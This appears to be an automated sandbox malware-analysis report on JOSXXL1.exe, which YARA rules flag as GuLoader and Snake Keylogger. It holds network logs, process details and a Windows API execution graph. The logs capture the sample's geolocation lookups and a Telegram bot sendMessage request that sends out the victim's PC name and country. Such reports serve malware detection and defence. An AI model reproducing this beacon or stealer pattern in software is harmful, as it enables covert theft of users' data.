2024-10-26 21:57:30 UTC | 895 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:30 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 11
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NT3InCukBb7PzfZt1L3QkI3u7HI12RdcQtxkvqydCeSeT%2FsMzhdn753u4FoteUVhk%2FLobt4P72I9NOMIN%2BpBmxEcJI%2FoevvFYJcuD2G6b%2FEtiGSeAl3av3Zk6R6jBJTZ4PsR7qu9"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3ce8ea7e7bf-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1596&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1781057&cwnd=251&unsent_bytes=0&cid=30b14040ca8f5fb2&ts=153&x=0"
2024-10-26 21:57:30 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-26 21:57:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 61976 | 188.114.96.3 | 443 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 21:57:31 UTC | 63 | OUT | GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-26 21:57:31 UTC | 897 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:31 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 12
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aFNPdMe%2BoyEtUwOm8G9%2F3u1eqeuLOtZ9sEIRkaPvKArYEpKswxYRALya%2BLVgDCTz%2BPzoKvhMdj5tnMv2lzXs%2FxQ0cAxt%2FUkOULEcvb1ohoOwDfy5R25EebdHlq0zS5GQQcu1Sqtl"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3d7beac6c74-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1140&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2448013&cwnd=251&unsent_bytes=0&cid=0b358a2c7152f94c&ts=155&x=0"
2024-10-26 21:57:31 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-26 21:57:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 61981 | 149.154.167.220 | 443 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 21:57:32 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20and%20Time:%2027/10/2024%20/%2006:11:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20447849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-10-26 21:57:32 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.18.0
                                                                                                      Date: Sat, 26 Oct 2024 21:57:32 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Content-Length: 55
                                                                                                      Connection: close
                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                      2024-10-26 21:57:32 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                      Target ID:0
                                                                                                      Start time:17:55:56
                                                                                                      Start date:26/10/2024
                                                                                                      Path:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\JOSXXL1.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:811'667 bytes
                                                                                                      MD5 hash:FB24966DAAB46AF066A7B7C041236DE9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2321723084.000000000890B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:17:57:00
                                                                                                      Start date:26/10/2024
                                                                                                      Path:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\JOSXXL1.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:811'667 bytes
                                                                                                      MD5 hash:FB24966DAAB46AF066A7B7C041236DE9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:19%
                                                                                                        Dynamic/Decrypted Code Coverage:13.5%
                                                                                                        Signature Coverage:20.2%
                                                                                                        Total number of Nodes:1562
                                                                                                        Total number of Limit Nodes:42
FindFirstFileW 5577->5578 5579 40282a 5578->5579 5582 402815 5578->5582 5580 402833 5579->5580 5584 4060ca wsprintfW 5579->5584 5585 406183 lstrcpynW 5580->5585 5584->5580 5585->5582 5600 1000103d 5601 1000101b 5 API calls 5600->5601 5602 10001056 5601->5602 5603 4014ff 5604 401507 5603->5604 5606 40151a 5603->5606 5605 402ba2 18 API calls 5604->5605 5605->5606 5607 401000 5608 401037 BeginPaint GetClientRect 5607->5608 5609 40100c DefWindowProcW 5607->5609 5611 4010f3 5608->5611 5612 401179 5609->5612 5613 401073 CreateBrushIndirect FillRect DeleteObject 5611->5613 5614 4010fc 5611->5614 5613->5611 5615 401102 CreateFontIndirectW 5614->5615 5616 401167 EndPaint 5614->5616 5615->5616 5617 401112 6 API calls 5615->5617 5616->5612 5617->5616 5625 401904 5626 40193b 5625->5626 5627 402bbf 18 API calls 5626->5627 5628 401940 5627->5628 5629 405974 69 API calls 5628->5629 5630 401949 5629->5630 5631 402d04 5632 402d16 SetTimer 5631->5632 5633 402d2f 5631->5633 5632->5633 5634 402d7d 5633->5634 5635 402d83 MulDiv 5633->5635 5636 402d3d wsprintfW SetWindowTextW SetDlgItemTextW 5635->5636 5636->5634 5638 402786 5639 40278d 5638->5639 5641 4029f7 5638->5641 5640 402ba2 18 API calls 5639->5640 5642 402798 5640->5642 5643 40279f SetFilePointer 5642->5643 5643->5641 5644 4027af 5643->5644 5646 4060ca wsprintfW 5644->5646 5646->5641 4473 100027c7 4474 10002817 4473->4474 4475 100027d7 VirtualProtect 4473->4475 4475->4474 5647 401907 5648 402bbf 18 API calls 5647->5648 5649 40190e 5648->5649 5650 4058c8 MessageBoxIndirectW 5649->5650 5651 401917 5650->5651 4476 401e08 4477 402bbf 18 API calls 4476->4477 4478 401e0e 4477->4478 4479 402bbf 18 API calls 4478->4479 4480 401e17 4479->4480 4481 402bbf 18 API calls 4480->4481 4482 401e20 4481->4482 4483 402bbf 18 API calls 4482->4483 4484 401e29 4483->4484 4485 401423 25 API calls 4484->4485 4486 401e30 ShellExecuteW 4485->4486 4487 401e61 4486->4487 5657 40398a 5658 403995 5657->5658 5659 40399c GlobalAlloc 5658->5659 5660 403999 
5658->5660 5659->5660 5661 1000164f 5662 10001516 GlobalFree 5661->5662 5664 10001667 5662->5664 5663 100016ad GlobalFree 5664->5663 5665 10001682 5664->5665 5666 10001699 VirtualFree 5664->5666 5665->5663 5666->5663 5667 401491 5668 4052e2 25 API calls 5667->5668 5669 401498 5668->5669 5677 401a15 5678 402bbf 18 API calls 5677->5678 5679 401a1e ExpandEnvironmentStringsW 5678->5679 5680 401a32 5679->5680 5682 401a45 5679->5682 5681 401a37 lstrcmpW 5680->5681 5680->5682 5681->5682 5683 402515 5684 402bbf 18 API calls 5683->5684 5685 40251c 5684->5685 5688 405d58 GetFileAttributesW CreateFileW 5685->5688 5687 402528 5688->5687 5689 402095 5690 402bbf 18 API calls 5689->5690 5691 40209c 5690->5691 5692 402bbf 18 API calls 5691->5692 5693 4020a6 5692->5693 5694 402bbf 18 API calls 5693->5694 5695 4020b0 5694->5695 5696 402bbf 18 API calls 5695->5696 5697 4020ba 5696->5697 5698 402bbf 18 API calls 5697->5698 5700 4020c4 5698->5700 5699 402103 CoCreateInstance 5704 402122 5699->5704 5700->5699 5701 402bbf 18 API calls 5700->5701 5701->5699 5702 401423 25 API calls 5703 4021e1 5702->5703 5704->5702 5704->5703 5705 404395 lstrlenW 5706 4043b4 5705->5706 5707 4043b6 WideCharToMultiByte 5705->5707 5706->5707 5708 401b16 5709 402bbf 18 API calls 5708->5709 5710 401b1d 5709->5710 5711 402ba2 18 API calls 5710->5711 5712 401b26 wsprintfW 5711->5712 5713 402a4c 5712->5713 5714 10001058 5715 10001074 5714->5715 5716 100010dd 5715->5716 5717 10001516 GlobalFree 5715->5717 5718 10001092 5715->5718 5717->5718 5719 10001516 GlobalFree 5718->5719 5720 100010a2 5719->5720 5721 100010b2 5720->5721 5722 100010a9 GlobalSize 5720->5722 5723 100010b6 GlobalAlloc 5721->5723 5724 100010c7 5721->5724 5722->5721 5725 1000153d 3 API calls 5723->5725 5726 100010d2 GlobalFree 5724->5726 5725->5724 5726->5716 5024 40159b 5025 402bbf 18 API calls 5024->5025 5026 4015a2 SetFileAttributesW 5025->5026 5027 4015b4 5026->5027 5727 40469b 5728 4046d1 5727->5728 5729 4046ab 5727->5729 5731 4042ae 8 API 
calls 5728->5731 5730 404247 19 API calls 5729->5730 5732 4046b8 SetDlgItemTextW 5730->5732 5733 4046dd 5731->5733 5732->5728 5734 401f1d 5735 402bbf 18 API calls 5734->5735 5736 401f24 5735->5736 5737 406559 5 API calls 5736->5737 5738 401f33 5737->5738 5739 401f4f GlobalAlloc 5738->5739 5741 401fb7 5738->5741 5740 401f63 5739->5740 5739->5741 5742 406559 5 API calls 5740->5742 5743 401f6a 5742->5743 5744 406559 5 API calls 5743->5744 5745 401f74 5744->5745 5745->5741 5749 4060ca wsprintfW 5745->5749 5747 401fa9 5750 4060ca wsprintfW 5747->5750 5749->5747 5750->5741 5751 40229d 5752 4022a5 5751->5752 5753 4022ab 5751->5753 5754 402bbf 18 API calls 5752->5754 5755 4022b9 5753->5755 5757 402bbf 18 API calls 5753->5757 5754->5753 5756 4022c7 5755->5756 5758 402bbf 18 API calls 5755->5758 5759 402bbf 18 API calls 5756->5759 5757->5755 5758->5756 5760 4022d0 WritePrivateProfileStringW 5759->5760 5036 40249e 5037 402cc9 19 API calls 5036->5037 5038 4024a8 5037->5038 5039 402ba2 18 API calls 5038->5039 5040 4024b1 5039->5040 5041 4024bc 5040->5041 5045 40281e 5040->5045 5042 4024d5 RegEnumValueW 5041->5042 5043 4024c9 RegEnumKeyW 5041->5043 5044 4024ee RegCloseKey 5042->5044 5042->5045 5043->5044 5044->5045 5761 40149e 5762 402288 5761->5762 5763 4014ac PostQuitMessage 5761->5763 5763->5762 5047 40231f 5048 402324 5047->5048 5049 40234f 5047->5049 5050 402cc9 19 API calls 5048->5050 5051 402bbf 18 API calls 5049->5051 5052 40232b 5050->5052 5053 402356 5051->5053 5054 402335 5052->5054 5058 40236c 5052->5058 5059 402bff RegOpenKeyExW 5053->5059 5055 402bbf 18 API calls 5054->5055 5056 40233c RegDeleteValueW RegCloseKey 5055->5056 5056->5058 5060 402c93 5059->5060 5063 402c2a 5059->5063 5060->5058 5061 402c50 RegEnumKeyW 5062 402c62 RegCloseKey 5061->5062 5061->5063 5065 406559 5 API calls 5062->5065 5063->5061 5063->5062 5064 402c87 RegCloseKey 5063->5064 5066 402bff 5 API calls 5063->5066 5068 402c76 5064->5068 5067 402c72 5065->5067 5066->5063 5067->5068 5069 402ca2 
RegDeleteKeyW 5067->5069 5068->5060 5069->5068 4029 405421 4030 405442 GetDlgItem GetDlgItem GetDlgItem 4029->4030 4031 4055cb 4029->4031 4075 40427c SendMessageW 4030->4075 4032 4055d4 GetDlgItem CreateThread CloseHandle 4031->4032 4033 4055fc 4031->4033 4032->4033 4148 4053b5 OleInitialize 4032->4148 4035 405627 4033->4035 4037 405613 ShowWindow ShowWindow 4033->4037 4038 40564c 4033->4038 4039 405633 4035->4039 4040 405687 4035->4040 4036 4054b2 4041 4054b9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4036->4041 4080 40427c SendMessageW 4037->4080 4084 4042ae 4038->4084 4043 405661 ShowWindow 4039->4043 4044 40563b 4039->4044 4040->4038 4048 405695 SendMessageW 4040->4048 4046 405527 4041->4046 4047 40550b SendMessageW SendMessageW 4041->4047 4051 405681 4043->4051 4052 405673 4043->4052 4081 404220 4044->4081 4054 40553a 4046->4054 4055 40552c SendMessageW 4046->4055 4047->4046 4050 40565a 4048->4050 4056 4056ae CreatePopupMenu 4048->4056 4053 404220 SendMessageW 4051->4053 4098 4052e2 4052->4098 4053->4040 4076 404247 4054->4076 4055->4054 4109 4061a5 4056->4109 4061 40554a 4064 405553 ShowWindow 4061->4064 4065 405587 GetDlgItem SendMessageW 4061->4065 4062 4056db GetWindowRect 4063 4056ee TrackPopupMenu 4062->4063 4063->4050 4066 405709 4063->4066 4067 405576 4064->4067 4068 405569 ShowWindow 4064->4068 4065->4050 4069 4055ae SendMessageW SendMessageW 4065->4069 4070 405725 SendMessageW 4066->4070 4079 40427c SendMessageW 4067->4079 4068->4067 4069->4050 4070->4070 4071 405742 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4070->4071 4073 405767 SendMessageW 4071->4073 4073->4073 4074 405790 GlobalUnlock SetClipboardData CloseClipboard 4073->4074 4074->4050 4075->4036 4077 4061a5 18 API calls 4076->4077 4078 404252 SetDlgItemTextW 4077->4078 4078->4061 4079->4065 4080->4035 4082 404227 4081->4082 4083 40422d SendMessageW 4081->4083 4082->4083 4083->4038 4085 4042c6 GetWindowLongW 4084->4085 4095 40434f 4084->4095 4086 4042d7 4085->4086 
4085->4095 4087 4042e6 GetSysColor 4086->4087 4088 4042e9 4086->4088 4087->4088 4089 4042f9 SetBkMode 4088->4089 4090 4042ef SetTextColor 4088->4090 4091 404311 GetSysColor 4089->4091 4092 404317 4089->4092 4090->4089 4091->4092 4093 40431e SetBkColor 4092->4093 4094 404328 4092->4094 4093->4094 4094->4095 4096 404342 CreateBrushIndirect 4094->4096 4097 40433b DeleteObject 4094->4097 4095->4050 4096->4095 4097->4096 4099 4052fd 4098->4099 4100 40539f 4098->4100 4101 405319 lstrlenW 4099->4101 4102 4061a5 18 API calls 4099->4102 4100->4051 4103 405342 4101->4103 4104 405327 lstrlenW 4101->4104 4102->4101 4106 405355 4103->4106 4107 405348 SetWindowTextW 4103->4107 4104->4100 4105 405339 lstrcatW 4104->4105 4105->4103 4106->4100 4108 40535b SendMessageW SendMessageW SendMessageW 4106->4108 4107->4106 4108->4100 4114 4061b2 4109->4114 4110 4063fd 4111 4056be AppendMenuW 4110->4111 4143 406183 lstrcpynW 4110->4143 4111->4062 4111->4063 4113 406265 GetVersion 4113->4114 4114->4110 4114->4113 4115 4063cb lstrlenW 4114->4115 4118 4061a5 10 API calls 4114->4118 4120 4062e0 GetSystemDirectoryW 4114->4120 4121 4062f3 GetWindowsDirectoryW 4114->4121 4123 406327 SHGetSpecialFolderLocation 4114->4123 4124 4061a5 10 API calls 4114->4124 4125 40636c lstrcatW 4114->4125 4127 406050 RegOpenKeyExW 4114->4127 4132 406417 4114->4132 4141 4060ca wsprintfW 4114->4141 4142 406183 lstrcpynW 4114->4142 4115->4114 4118->4115 4120->4114 4121->4114 4123->4114 4126 40633f SHGetPathFromIDListW CoTaskMemFree 4123->4126 4124->4114 4125->4114 4126->4114 4128 4060c4 4127->4128 4129 406084 RegQueryValueExW 4127->4129 4128->4114 4131 4060a5 RegCloseKey 4129->4131 4131->4128 4138 406424 4132->4138 4133 40649a 4134 40649f CharPrevW 4133->4134 4137 4064c0 4133->4137 4134->4133 4135 40648d CharNextW 4135->4133 4135->4138 4137->4114 4138->4133 4138->4135 4139 406479 CharNextW 4138->4139 4140 406488 CharNextW 4138->4140 4144 405b64 4138->4144 4139->4138 4140->4135 4141->4114 4142->4114 4143->4111 4145 
405b6a 4144->4145 4146 405b80 4145->4146 4147 405b71 CharNextW 4145->4147 4146->4138 4147->4145 4155 404293 4148->4155 4150 404293 SendMessageW 4152 405411 OleUninitialize 4150->4152 4151 4053d8 4154 4053ff 4151->4154 4158 401389 4151->4158 4154->4150 4156 4042ab 4155->4156 4157 40429c SendMessageW 4155->4157 4156->4151 4157->4156 4160 401390 4158->4160 4159 4013fe 4159->4151 4160->4159 4161 4013cb MulDiv SendMessageW 4160->4161 4161->4160 5764 100010e1 5773 10001111 5764->5773 5765 100011d8 GlobalFree 5766 100012ba 2 API calls 5766->5773 5767 100011d3 5767->5765 5768 100011f8 GlobalFree 5768->5773 5769 10001272 2 API calls 5772 100011c4 GlobalFree 5769->5772 5770 10001164 GlobalAlloc 5770->5773 5771 100012e1 lstrcpyW 5771->5773 5772->5773 5773->5765 5773->5766 5773->5767 5773->5768 5773->5769 5773->5770 5773->5771 5773->5772 5774 401ca3 5775 402ba2 18 API calls 5774->5775 5776 401ca9 IsWindow 5775->5776 5777 401a05 5776->5777 5778 402a27 SendMessageW 5779 402a41 InvalidateRect 5778->5779 5780 402a4c 5778->5780 5779->5780 4488 40242a 4499 402cc9 4488->4499 4490 402434 4491 402bbf 18 API calls 4490->4491 4492 40243d 4491->4492 4493 402448 RegQueryValueExW 4492->4493 4495 40281e 4492->4495 4494 402468 4493->4494 4496 40246e RegCloseKey 4493->4496 4494->4496 4503 4060ca wsprintfW 4494->4503 4496->4495 4500 402bbf 18 API calls 4499->4500 4501 402ce2 4500->4501 4502 402cf0 RegOpenKeyExW 4501->4502 4502->4490 4503->4496 5788 40172d 5789 402bbf 18 API calls 5788->5789 5790 401734 SearchPathW 5789->5790 5791 40174f 5790->5791 5792 4027b4 5793 4027ba 5792->5793 5794 4027c2 FindClose 5793->5794 5795 402a4c 5793->5795 5794->5795 4590 4033b6 SetErrorMode GetVersion 4591 4033ea 4590->4591 4592 4033f0 4590->4592 4594 406559 5 API calls 4591->4594 4681 4064ed GetSystemDirectoryW 4592->4681 4594->4592 4595 403407 4596 4064ed 3 API calls 4595->4596 4597 403411 4596->4597 4598 4064ed 3 API calls 4597->4598 4599 40341b 4598->4599 4684 406559 GetModuleHandleA 4599->4684 4602 406559 5 
API calls 4603 403429 #17 OleInitialize SHGetFileInfoW 4602->4603 4690 406183 lstrcpynW 4603->4690 4605 403466 GetCommandLineW 4691 406183 lstrcpynW 4605->4691 4607 403478 GetModuleHandleW 4608 403490 4607->4608 4609 405b64 CharNextW 4608->4609 4610 40349f CharNextW 4609->4610 4611 4035ca GetTempPathW 4610->4611 4618 4034b8 4610->4618 4692 403385 4611->4692 4613 4035e2 4614 4035e6 GetWindowsDirectoryW lstrcatW 4613->4614 4615 40363c DeleteFileW 4613->4615 4619 403385 12 API calls 4614->4619 4702 402e41 GetTickCount GetModuleFileNameW 4615->4702 4616 405b64 CharNextW 4616->4618 4618->4616 4624 4035b5 4618->4624 4625 4035b3 4618->4625 4620 403602 4619->4620 4620->4615 4622 403606 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4620->4622 4621 403650 4626 4036f3 4621->4626 4630 405b64 CharNextW 4621->4630 4676 403703 4621->4676 4623 403385 12 API calls 4622->4623 4628 403634 4623->4628 4788 406183 lstrcpynW 4624->4788 4625->4611 4732 4039cc 4626->4732 4628->4615 4628->4676 4647 40366f 4630->4647 4633 40383e 4636 4038c2 ExitProcess 4633->4636 4637 403846 GetCurrentProcess OpenProcessToken 4633->4637 4634 40371e 4635 4058c8 MessageBoxIndirectW 4634->4635 4639 40372c ExitProcess 4635->4639 4642 403892 4637->4642 4643 40385e LookupPrivilegeValueW AdjustTokenPrivileges 4637->4643 4640 403734 4814 40584b 4640->4814 4641 4036cd 4789 405c3f 4641->4789 4646 406559 5 API calls 4642->4646 4643->4642 4650 403899 4646->4650 4647->4640 4647->4641 4653 4038ae ExitWindowsEx 4650->4653 4656 4038bb 4650->4656 4651 403755 lstrcatW lstrcmpiW 4655 403771 4651->4655 4651->4676 4652 40374a lstrcatW 4652->4651 4653->4636 4653->4656 4658 403776 4655->4658 4659 40377d 4655->4659 4660 40140b 2 API calls 4656->4660 4657 4036e8 4804 406183 lstrcpynW 4657->4804 4817 4057b1 CreateDirectoryW 4658->4817 4822 40582e CreateDirectoryW 4659->4822 4660->4636 4665 403782 SetCurrentDirectoryW 4666 403792 4665->4666 4667 40379d 4665->4667 4825 406183 lstrcpynW 4666->4825 4826 406183 
lstrcpynW 4667->4826 4670 4061a5 18 API calls 4671 4037dc DeleteFileW 4670->4671 4672 4037e9 CopyFileW 4671->4672 4677 4037ab 4671->4677 4672->4677 4673 403832 4674 406024 38 API calls 4673->4674 4674->4676 4805 4038da 4676->4805 4677->4670 4677->4673 4678 4061a5 18 API calls 4677->4678 4680 40381d CloseHandle 4677->4680 4827 406024 MoveFileExW 4677->4827 4831 405863 CreateProcessW 4677->4831 4678->4677 4680->4677 4682 40650f wsprintfW LoadLibraryW 4681->4682 4682->4595 4685 406575 4684->4685 4686 40657f GetProcAddress 4684->4686 4687 4064ed 3 API calls 4685->4687 4688 403422 4686->4688 4689 40657b 4687->4689 4688->4602 4689->4686 4689->4688 4690->4605 4691->4607 4693 406417 5 API calls 4692->4693 4695 403391 4693->4695 4694 40339b 4694->4613 4695->4694 4696 405b37 3 API calls 4695->4696 4697 4033a3 4696->4697 4698 40582e 2 API calls 4697->4698 4699 4033a9 4698->4699 4700 405d87 2 API calls 4699->4700 4701 4033b4 4700->4701 4701->4613 4834 405d58 GetFileAttributesW CreateFileW 4702->4834 4704 402e84 4731 402e91 4704->4731 4835 406183 lstrcpynW 4704->4835 4706 402ea7 4836 405b83 lstrlenW 4706->4836 4710 402eb8 GetFileSize 4711 402fb9 4710->4711 4730 402ecf 4710->4730 4712 402d9f 33 API calls 4711->4712 4714 402fc0 4712->4714 4713 403358 ReadFile 4713->4730 4715 402ffc GlobalAlloc 4714->4715 4714->4731 4842 40336e SetFilePointer 4714->4842 4718 403013 4715->4718 4716 403054 4719 402d9f 33 API calls 4716->4719 4723 405d87 2 API calls 4718->4723 4719->4731 4720 402fdd 4721 403358 ReadFile 4720->4721 4724 402fe8 4721->4724 4722 402d9f 33 API calls 4722->4730 4725 403024 CreateFileW 4723->4725 4724->4715 4724->4731 4726 40305e 4725->4726 4725->4731 4841 40336e SetFilePointer 4726->4841 4728 40306c 4729 4030e7 45 API calls 4728->4729 4729->4731 4730->4711 4730->4713 4730->4716 4730->4722 4730->4731 4731->4621 4733 406559 5 API calls 4732->4733 4734 4039e0 4733->4734 4735 4039e6 4734->4735 4736 4039f8 4734->4736 4852 4060ca wsprintfW 4735->4852 4737 406050 3 API calls 
4736->4737 4738 403a28 4737->4738 4740 403a47 lstrcatW 4738->4740 4742 406050 3 API calls 4738->4742 4741 4039f6 4740->4741 4843 403ca2 4741->4843 4742->4740 4745 405c3f 18 API calls 4746 403a79 4745->4746 4747 403b0d 4746->4747 4749 406050 3 API calls 4746->4749 4748 405c3f 18 API calls 4747->4748 4750 403b13 4748->4750 4751 403aab 4749->4751 4752 403b23 LoadImageW 4750->4752 4753 4061a5 18 API calls 4750->4753 4751->4747 4756 403acc lstrlenW 4751->4756 4761 405b64 CharNextW 4751->4761 4754 403bc9 4752->4754 4755 403b4a RegisterClassW 4752->4755 4753->4752 4759 40140b 2 API calls 4754->4759 4757 403b80 SystemParametersInfoW CreateWindowExW 4755->4757 4758 403bd3 4755->4758 4762 403b00 4756->4762 4763 403ada lstrcmpiW 4756->4763 4757->4754 4758->4676 4760 403bcf 4759->4760 4760->4758 4767 403ca2 19 API calls 4760->4767 4765 403ac9 4761->4765 4764 405b37 3 API calls 4762->4764 4763->4762 4766 403aea GetFileAttributesW 4763->4766 4768 403b06 4764->4768 4765->4756 4769 403af6 4766->4769 4771 403be0 4767->4771 4853 406183 lstrcpynW 4768->4853 4769->4762 4770 405b83 2 API calls 4769->4770 4770->4762 4773 403bec ShowWindow 4771->4773 4774 403c6f 4771->4774 4776 4064ed 3 API calls 4773->4776 4775 4053b5 5 API calls 4774->4775 4777 403c75 4775->4777 4780 403c04 4776->4780 4778 403c91 4777->4778 4781 403c79 4777->4781 4782 40140b 2 API calls 4778->4782 4779 403c12 GetClassInfoW 4784 403c26 GetClassInfoW RegisterClassW 4779->4784 4785 403c3c DialogBoxParamW 4779->4785 4780->4779 4783 4064ed 3 API calls 4780->4783 4781->4758 4786 40140b 2 API calls 4781->4786 4782->4758 4783->4779 4784->4785 4787 40140b 2 API calls 4785->4787 4786->4758 4787->4758 4788->4625 4855 406183 lstrcpynW 4789->4855 4791 405c50 4856 405be2 CharNextW CharNextW 4791->4856 4794 4036d9 4794->4676 4803 406183 lstrcpynW 4794->4803 4795 406417 5 API calls 4801 405c66 4795->4801 4796 405c97 lstrlenW 4797 405ca2 4796->4797 4796->4801 4799 405b37 3 API calls 4797->4799 4798 4064c6 2 API calls 4798->4801 4800 
405ca7 GetFileAttributesW 4799->4800 4800->4794 4801->4794 4801->4796 4801->4798 4802 405b83 2 API calls 4801->4802 4802->4796 4803->4657 4804->4626 4806 4038f5 4805->4806 4807 4038eb CloseHandle 4805->4807 4808 403909 4806->4808 4809 4038ff CloseHandle 4806->4809 4807->4806 4862 403937 4808->4862 4809->4808 4815 406559 5 API calls 4814->4815 4816 403739 lstrcatW 4815->4816 4816->4651 4816->4652 4818 405802 GetLastError 4817->4818 4819 40377b 4817->4819 4818->4819 4820 405811 SetFileSecurityW 4818->4820 4819->4665 4820->4819 4821 405827 GetLastError 4820->4821 4821->4819 4823 405842 GetLastError 4822->4823 4824 40583e 4822->4824 4823->4824 4824->4665 4825->4667 4826->4677 4828 406038 4827->4828 4830 406045 4827->4830 4916 405eb2 lstrcpyW 4828->4916 4830->4677 4832 4058a2 4831->4832 4833 405896 CloseHandle 4831->4833 4832->4677 4833->4832 4834->4704 4835->4706 4837 405b91 4836->4837 4838 402ead 4837->4838 4839 405b97 CharPrevW 4837->4839 4840 406183 lstrcpynW 4838->4840 4839->4837 4839->4838 4840->4710 4841->4728 4842->4720 4844 403cb6 4843->4844 4854 4060ca wsprintfW 4844->4854 4846 403d27 4847 4061a5 18 API calls 4846->4847 4848 403d33 SetWindowTextW 4847->4848 4849 403a57 4848->4849 4850 403d4f 4848->4850 4849->4745 4850->4849 4851 4061a5 18 API calls 4850->4851 4851->4850 4852->4741 4853->4747 4854->4846 4855->4791 4857 405bff 4856->4857 4860 405c11 4856->4860 4859 405c0c CharNextW 4857->4859 4857->4860 4858 405c35 4858->4794 4858->4795 4859->4858 4860->4858 4861 405b64 CharNextW 4860->4861 4861->4860 4863 403945 4862->4863 4864 40390e 4863->4864 4865 40394a FreeLibrary GlobalFree 4863->4865 4866 405974 4864->4866 4865->4864 4865->4865 4867 405c3f 18 API calls 4866->4867 4868 405994 4867->4868 4869 4059b3 4868->4869 4870 40599c DeleteFileW 4868->4870 4872 405ade 4869->4872 4906 406183 